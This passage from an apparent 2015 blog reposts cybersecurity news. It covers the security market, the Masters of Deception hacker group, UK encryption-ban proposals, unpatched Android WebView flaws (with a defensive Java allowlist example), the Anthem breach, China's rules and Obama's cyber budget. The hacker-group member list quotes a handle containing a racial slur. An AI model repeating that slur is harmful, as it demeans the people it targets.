According to FBR's Ives, emerging cybersecurity companies could earn a combined annual revenue of $15 billion to $20 billion in three years. That excludes the slower growing but larger market for traditional cybersecurity technology, such as anti-virus software.

Venky Ganesan, managing director at Silicon Valley venture capital firm Menlo Ventures, said average corporate spending on cybersecurity will rise from about 0.25 percent of total revenue to as much as 2 percent of revenue in the coming years.

"The window is wide open for cybersecurity companies. We have a perfect storm of opportunity," said Ganesan, who had invested in Palo Alto Networks while at Globespan Capital.

Source Reuters

Thursday, 12 February 2015

Cybercrime: Masters of Deception: the gang that really were the kings and ruled cyberspace but were finally prosecuted!

The original Masters of Deception included: Mark Abene ("Phiber Optik"), Paul Stira ("Scorpion"), Eli Ladopoulos ("Acid Phreak"), HAC, John Lee ("Corrupt") and Julio Fernandez ("Outlaw").

Additional members whose real names are unknown include: Supernigger (also of DPAK), Wing, Nynex Phreak, Billy_The_Kid, Crazy Eddie, The Plague, ZOD, Seeker, Red Knight (who was also a member of Cult of the Dead Cow), Lord Micro, n00gie and peaboy (a.k.a. MCI Sprinter).

Masters of Deception (MOD) was a New York-based group of hackers, most widely known in media for their exploits of telephone company infrastructure and later prosecution, as well as being the subject of the book Masters of Deception: The Gang That Ruled Cyberspace by Josh Quittner.


Masters of Deception operated differently in many respects to previous hacking groups. Although they openly shared information with each other, they took a controversial view on sharing information outside the group. It was believed that access to MOD's knowledge should be earned via degrees of initiation and a proven respect for the craft, rather than releasing powerful information into the wild where it could be used for nefarious purposes. A demonstration of responsibility on the part of the initiate was required. This informal compartmentalized protection of more sensitive knowledge was a structure originally employed by LOD in the 1980s, rather successfully. According to Lex Luthor, "I realized early on that only certain people can be trusted with certain information, and certain types of information can be trusted to no one. Giving out useful things to irresponsible people would inevitably lead to whatever thing it was being abused and no longer useful. I was very possessive of my information and frequently withheld things from my articles."—Phrack #40 interview, 1/8/1992.

Their Story + Origin

MOD's initial membership grew from meetings on Loop-Around Test Lines that led to legendary collaborations to hack RBOC phone switches and the various minicomputers and mainframes used to administer the telephone network. They successfully remained underground using alternative handles to hide even their true hacker identities.

Acid Phreak founded the Masters of Deception with Scorpion and HAC. The name itself was, among other things, a mockery of LOD, as 'M' is one letter up in the alphabet from 'L', although the name originally was a flexible acronym that could be used to identify membership in situations where anonymity would be the best course of action. It could stand for "Millions of Dollars" just as easily as "Masters of Deception."

It is claimed that the mockery of the LOD name was a statement to the underground that LOD had lost its direction. Several LOD members were close friends of MOD who had been raided and indicted by the government, causing the majority of those who remained to drop out of the underground for safety reasons. In their absence, LOD largely fell into disarray causing the disagreement and disillusionment that led Phiber Optik to align himself with MOD in an effort to restore the direction of the spirit of underground hacking.

The Fall of MOD

As a result of a major nationwide investigation by a joint FBI/Secret Service task force, five of MOD's members were indicted in 1992 in federal court. The case was prosecuted by the U.S. Attorney's Office for the Southern District of New York by Assistant U.S. Attorneys Stephen Fishbein and Geoffrey S. Berman.[1] Within the next six months (in 1993), all five pleaded guilty and were sentenced to either probation or prison. After the sentencing of Abene, 2600: The Hacker Quarterly, Winter 1993-94, had on its cover a rag doll labeled "BERMAN" stabbed by a dagger.

Source Wikipedia


Friday, 6 February 2015

UK Prime Minister David Cameron has vowed to ban personal encrypted communications apps such as Snapchat and WhatsApp

UK Prime Minister David Cameron has argued that the safety of citizens trumps privacy and that the government should be able to monitor any communications if warranted. "If Cameron succeeds," said tech analyst Charles King, "UK citizens can take comfort in their government acting with all the foresight and wisdom of other beacons of freedom, including China, Russia, Egypt and Iran."
By Richard Adhikari
01/15/15 3:03 PM PT

UK Prime Minister David Cameron, who is standing for re-election, has vowed to ban personal encrypted communications apps such as Snapchat and WhatsApp if he is voted in.

He also will allow UK government security agencies to monitor communications, with warrants signed by the Home Secretary.

"The first duty of any government is to keep our country and our people safe," Cameron declared earlier this week.

Myopia Rules, OK!

Cameron's proposal triggered a storm of criticism.

"We've seen proposals similar to this before, but never as unbelievably shortsighted," commented Joseph Hall, chief technologist at the Center for Democracy & Technology.

The FBI has been arguing for years that it needs backdoors into encrypted communications and devices, but Cameron is "going even further to demand no one can have walls," Hall told TechNewsWorld. "He seems to want to ban confidential communications entirely."

The proposal "is particularly boneheaded," because to ban applications such as SnapChat and WhatsApp, the UK would "effectively have to ban mathematics," Hall continued.

"I can write the equation for how to protect a message from government surveillance on a piece of paper, and it's not really hard to write or distribute code that does this," pointed out Danny O'Brien, international director at the Electronic Frontier Foundation.

Without strong cryptography, anyone can intercept content, O'Brien told TechNewsWorld, so governments can "either mandate that no one has secure messaging, except for criminals who are going to use it anyway, or that because we need a secure financial and communications infrastructure, we should work on other ways to fight terrorism."

Other Alternatives

One of the other ways to fight terrorism is to keep a close eye on suspected terrorists.

The French authorities in 2010 reportedly placed under surveillance members of the Islamic extremist cell linked to the gunmen who committed the Charlie Hebdo massacre, but they slacked off after a while.

A Marriage Made in Spy Heaven

Intelligence officials have made the argument that increased surveillance of suspects and perhaps even the imposition of widespread surveillance of the general population are crucial in the fight against terror.

However, such widespread surveillance by the NSA has been notoriously fruitless in the U.S.

Further, the UK's Government Communications Headquarters has spoofed LinkedIn pages to target engineers at a Belgian carrier and apparently aims to be able to track mobile phones worldwide, according to Der Spiegel.

GCHQ reportedly has worked with the United States National Security Agency to make a secret map of the Internet and Web users, The Intercept reported.

The NSA tracks 5 billion cellphone locations worldwide, and since it shares a lot of data with GCHQ, it's possible the UK intelligence agency also has access to much of that data.

Further, German researchers recently demonstrated that vulnerabilities in Signaling System 7 (SS7) telephony signaling protocols let third parties listen in to cellphone calls and intercept text messages despite encryption.

Cameron's Sound and Fury

"I doubt many governments, especially the U.S. government, would agree that [Cameron's plan] is a good idea," the CDT's Hall said.

If they did, the open source nature of many of the components of apps like SnapChat and WhatsApp makes it easy for people to create such applications themselves, and that could lead to a black market for them, Hall argued.

"Anyone in the UK or out of it could use freely available alternatives" like PGP and OTR to secure their communications, the EFF's O'Brien noted. Banning encrypted apps "would devastate their industry's trust in online communications, leading to a mass exodus of those sectors out of the UK."

Other governments have proactively limited or killed innovative communications applications and methodologies, Charles King, principal analyst at Pund-IT, told TechNewsWorld.

"If Cameron succeeds," he said, "UK citizens can take comfort in their government acting with all the foresight and wisdom of other beacons of freedom, including China, Russia, Egypt and Iran."

Source TechNewsWorld

Google Gives WebView the Cold Shoulder by not fixing vulnerabilities in WebView for Android 4.3

Figures from a seven-day period ending Jan. 5 posted on the Android Developers Dashboard indicate Jelly Bean had 46 percent of the market and KitKat 39 percent. Ice Cream Sandwich had 6.7 percent and Gingerbread 7.8 percent. Lollipop didn't make the cut for the dashboard, which doesn't display any versions with less than 0.1 percent distribution. In other words, a good 60 percent of Android users are at risk from WebView flaws

Google has decided not to fix vulnerabilities in WebView for Android 4.3 and older, sparking heated discussions among developers.

Those versions of WebView run on the WebKit browser. Fixing them "required changes to significant portions of the code and was no longer practical to do so safely," Adrian Ludwig, lead engineer for Android security, explained last week in a post.

Ludwig recommended steps users and developers can take to mitigate the potential exploitation of WebView vulnerabilities without updating to Lollipop, or Android 5.0.

The decision will leave 930 million users of Android devices in the lurch, Tod Beardsley warned earlier this month.

Let 'Em Eat Cake!

Users should employ a browser that has its own content renderer and is regularly updated, Ludwig suggested.

Chrome and Firefox are securely updated through Google Play, he pointed out. Firefox is supported on Android 2.3 and higher, while Chrome is supported on Android 4.0 and higher.

Consumers should load content only from trusted sources, Ludwig advised.

Developers should "confirm that only trusted content ... is displayed within WebViews in their application," he said. They should consider providing their own renderer on Android 4.3 and earlier so they can update it with the latest security patches.
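Ludwig's advice that developers display only trusted content in their WebViews comes down, in practice, to a host allowlist enforced by the app's own WebViewClient. The class below is an added example written for this post, not code from Google or from the article: the host names in TRUSTED_HOSTS are hypothetical, and it deliberately uses the String-based WebViewClient callbacks that exist on Android 4.3 and earlier, which is the population the article says will not receive WebView fixes.

```java
import android.net.Uri;
import android.os.Build;
import android.webkit.WebResourceResponse;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.io.ByteArrayInputStream;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

/**
 * Example WebViewClient that only lets allowlisted HTTPS hosts load.
 * Added illustration; the hosts below are hypothetical placeholders.
 */
public final class TrustedWebViewClient extends WebViewClient {

    // Hypothetical allowlist; a real app lists the hosts it actually serves from.
    private static final Set<String> TRUSTED_HOSTS = new HashSet<>(Arrays.asList(
            "app.example.com",
            "static.example.com"));

    /** True only for https:// URLs whose host is on the allowlist. */
    static boolean isTrusted(String url) {
        if (url == null) return false;
        Uri uri = Uri.parse(url);
        String host = uri.getHost();
        return "https".equalsIgnoreCase(uri.getScheme())
                && host != null
                && TRUSTED_HOSTS.contains(host.toLowerCase());
    }

    // Top-level navigations: link clicks, redirects, window.location changes.
    // Returning true tells WebView the app "handled" the URL, so the load is dropped.
    @Override
    public boolean shouldOverrideUrlLoading(WebView view, String url) {
        return !isTrusted(url);
    }

    // Subresources the page itself pulls in: scripts, iframes, images, XHR.
    // Returning null lets WebView fetch normally; an empty response blocks it
    // without tearing down the renderer.
    @Override
    public WebResourceResponse shouldInterceptRequest(WebView view, String url) {
        if (isTrusted(url)) return null;
        return new WebResourceResponse("text/plain", "utf-8",
                new ByteArrayInputStream(new byte[0]));
    }

    /** Attach the client and a conservative settings profile to a WebView. */
    public static void harden(WebView webView) {
        WebSettings s = webView.getSettings();
        s.setJavaScriptEnabled(false);      // enable only for pages that need it
        s.setAllowFileAccess(false);        // no file:// reads from the app sandbox
        s.setAllowContentAccess(false);     // no content:// provider reads
        if (Build.VERSION.SDK_INT >= 16) {  // these two setters exist from API 16
            s.setAllowFileAccessFromFileURLs(false);
            s.setAllowUniversalAccessFromFileURLs(false);
        }
        webView.setWebViewClient(new TrustedWebViewClient());
    }

    /**
     * shouldOverrideUrlLoading is not called for the URL handed to loadUrl(),
     * so the initial load is checked here before it ever reaches WebView.
     */
    public static void loadTrusted(WebView webView, String url) {
        if (!isTrusted(url)) {
            throw new IllegalArgumentException("refusing untrusted URL: " + url);
        }
        webView.loadUrl(url);
    }
}
```

Two details matter for anyone adapting this. First, the navigation callback does not fire for the URL passed to loadUrl, which is why the initial load goes through loadTrusted rather than relying on the client alone. Second, shouldInterceptRequest is what catches a trusted page embedding a script or iframe from an untrusted origin; without it, an allowlisted page can still pull attacker-controlled content into the vulnerable renderer. Keeping JavaScript off by default removes most of the legacy WebKit attack surface and should be switched on only for the specific content that needs it.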

Everybody's Going for Shiny New Stuff

"With the advances in Android 4.4, the number of users that are potentially affected by legacy WebKit security issues is shrinking every day as more and more people upgrade or get new devices," Ludwig observed.

Android 4.4, aka "KitKat," introduced a new WebView component based on the Chromium open source project. It includes an updated version of the V8 JavaScript engine and support for modern Web standards not in the earlier version of WebView.

However, Google's own statistics tell a different tale.

Figures from a seven-day period ending Jan. 5 posted on the Android Developers Dashboard indicate Jelly Bean had 46 percent of the market and KitKat 39 percent. Ice Cream Sandwich had 6.7 percent and Gingerbread 7.8 percent. Lollipop didn't make the cut for the dashboard, which doesn't display any versions with less than 0.1 percent distribution.

In other words, a good 60 percent of Android users are at risk from WebView flaws.

Still, "generally speaking, Google can't go back and support all the old versions," said Al Hilwa, a research program director at IDC.

"You have to have a cutoff at some point and go forward," he told TechNewsWorld. "That's pretty normal for the industry."

Reactions to Ludwig's Ideas

"Telling app developers to just provide your renderer rather than you guys handling your own screw-ups? What a joke," wrote Jake Weisz in response to Ludwig's post. Stating the fix is expensive or difficult "is not an excuse because it's Google's responsibility."

Also, "as a developer of an app that renders content from the open Web, I feel like [the suggestion devs provide their own renderer] badly misrepresents and underestimates the work involved in such a task," Chris Lacy wrote. "Building and shipping a Web render is an absolutely massive task."

From a developer perspective, "it isn't right for Google to not provide backward compatibility or at least a support library for most of the vulnerabilities," said Anirudh Pothani, head of Android development at Copper Mobile.

"This isn't the first time Google has done something to make developers' lives hard by not providing backward compatibility," he told TechNewsWorld.

In most cases, developers "might require a custom implementation of the WebView" to patch the vulnerability, Pothani said.

However, most developers might not do anything to fix the problem, because the independents might not have the time to write their own WebView, he noted, while for corporate devs, most companies "do not provide adequate time to fix issues which might need them to rewrite the core framework being used in their app."

Source TechNewsWorld

Health insurer Anthem hit by massive cybersecurity breach

Health insurer Anthem Inc , which has nearly 40 million U.S. customers, said late on Wednesday that hackers had breached one of its IT systems and stolen personal information relating to current and former consumers and employees.

The No. 2 health insurer in the United States said the breach did not appear to involve medical information or financial details such as credit card or bank account numbers.

The information accessed during the "very sophisticated attack" did include names, birthdays, social security numbers, street addresses, email addresses and employment information, including income data, the company said.

Anthem said that it immediately made every effort to close the security vulnerability and reported the attack to the FBI. Cybersecurity firm FireEye Inc said it had been hired to help Anthem investigate the attack.

The company did not say how many customers and staff were affected, but the Wall Street Journal earlier reported it was suspected that records of tens of millions of people had been taken, which would likely make it the largest data breach involving a U.S. health insurer.
FireEye information analysts work at the company's office in Milpitas, California, December 29, 2014 …

Anthem had 37.5 million medical members as of the end of December.

"This attack is another reminder of the persistent threats we face, and the need for Congress to take aggressive action to remove legal barriers for sharing cyber threat information," U.S. Rep. Michael McCaul, a Republican from Texas and chairman of the Committee on Homeland Security, said in a statement late Wednesday.

The FBI had warned last August that healthcare industry companies were being targeted by hackers, publicizing the issue following an attack on U.S. hospital group Community Health Systems Inc that resulted in the theft of millions of patient records.

Medical identity theft is often not immediately identified by patients or their provider, giving criminals years to milk such credentials. That makes medical data more valuable than credit cards, which tend to be quickly canceled by banks once fraud is detected.

Security experts say cyber criminals are increasingly targeting the $3 trillion U.S. healthcare industry, which has many companies still reliant on aging computer systems that do not use the latest security features.

Anthem said it would send a letter and email to everyone whose information was stored in the hacked database. It also set up an informational website,, and will offer to provide a credit-monitoring service.

U.S. businesses ask White House to help on China cybersecurity rules

A map of China is seen through a magnifying glass on a computer screen showing binary digits in Singapore in this January 2, 2014 photo illustration. REUTERS/Edgar Su
 U.S. business lobbies called on the White House this week for help to overturn new Chinese cybersecurity regulations they say would hurt market opportunities abroad and jobs in the U.S.

In a letter sent to officials including Secretary of State John Kerry and U.S. Trade Representative Michael Froman on Feb. 4, the U.S. Chamber of Commerce and 16 other U.S. business lobbies said the new rules raised questions about China's international trade commitments.

"(We) request your immediate action to work with Chinese officials to reverse an alarming number of troubling, new Chinese government policies impacting the information and communications technology (ICT) sector," said the letter, first reported in the Wall Street Journal.

Cybersecurity has been a significant irritant in U.S.-China ties, with both sides accusing the other of abuses. U.S. tech groups wrote to the Chinese administration about the same policies on Jan. 28.

New cybersecurity regulations would force technology vendors to Chinese banks to hand over secret source code and adopt Chinese encryption algorithms.

The policies would have a "significant negative impact" on U.S. ICT companies’ market opportunities in China and ultimately crimp investment in research and development back home, hurting U.S. jobs, the groups said.

U.S. manufacturers would also suffer as the policies would restrict cross-border data flows and create another market barrier for foreign financial services and telecommunications companies said the letter, which was also signed by the National Association of Manufacturers.

Source Reuters

Obama seeks $14 billion to boost U.S. cybersecurity defenses

President Barack Obama's budget proposal for the 2016 fiscal year seeks $14 billion (9 billion pounds) for cybersecurity efforts across the U.S. government to better protect federal and private networks from hacking threats.

Federal cybersecurity funding has steadily increased in recent years, reflecting the intensity of threats U.S. companies and government agencies are facing from cyber intruders, both domestic and foreign.

The budget, released on Monday, calls for deployment of more intrusion detection and prevention capabilities, greater sharing of data with the private sector and other countries and more funding to beef up the government's ability to respond to attacks.

The funding would support several specific programs, such as monitoring and diagnostics of federal computer networks, the EINSTEIN intrusion detection and prevention system and government-wide testing and incident-response training.

"Cyber threats targeting the private sector, critical infrastructure and the federal government demonstrate that no sector, network or system is immune to infiltration by those seeking to steal commercial or government secrets and property or perpetrate malicious and disruptive activity," the White House summary said.

It is unclear how much funding the Republican-controlled Congress will dedicate to cybersecurity efforts during the next fiscal year.

Among various requests, the White House sought $227 million for construction of a Civilian Cyber Campus, meant to spur public-private partnerships, and $160 million for information technology and cybersecurity of the weapons programme at the Energy Department's National Nuclear Security Administration.

The Pentagon's budget alone called for $5.5 billion in funding for cybersecurity. The agency's chief weapons tester last month told Congress that nearly every U.S. weapons programme showed "significant vulnerabilities" to cyber attacks, including misconfigured, unpatched and outdated software.

Increased funding for protection of government networks would be good news for big weapons makers like Lockheed Martin Corp, General Dynamics Corp, Northrop Grumman Corp and Raytheon, which already play a big role in cybersecurity, encryption and analysis for defences and intelligence agencies.

A range of medium-sized and smaller companies is also poised to benefit, including Science Applications International Corp, Booz Allen Hamilton, CACI International and Computer Sciences Corp.

In the private sector, where companies have grown increasingly concerned in the wake of attacks on retailers, banks and others, higher spending is likely to boost companies like Hewlett Packard, which offers cybersecurity services.

The White House's budget for most agencies referenced their cybersecurity efforts, including the Department of Health and Human Services and the Office of Personnel Management. Obama also asked for at least $28 million for the Agriculture Department's Chief Information Officer to improve the agency's cybersecurity and $15 million for the FBI's grants, training, and technical assistance programme that helps local law enforcement fight economic, high-technology and Internet crimes.

Source Reuters
